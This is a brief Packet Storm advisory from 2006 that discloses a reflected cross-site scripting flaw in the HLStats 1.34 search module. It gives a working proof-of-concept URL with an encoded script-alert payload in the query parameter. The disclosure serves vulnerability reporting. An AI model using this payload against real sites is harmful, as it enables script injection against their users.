hlstatsXSS.txt

2006-08-29T00:00:00
ID PACKETSTORM:49545
Type packetstorm
Reporter kefka
Modified 2006-08-29T00:00:00

Description

                                        
                                            `Cross-site Scripting Vulnerability in HLStats 1.34  
  
hlstats.php?mode=search&game=cstrike&st=player&q=%22%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E%22  
  
Search module fails to sanitize quotes.  
  
kefka  
kefka@kevinbeardsucks.com  
  
Thanks to RSnake  
  
`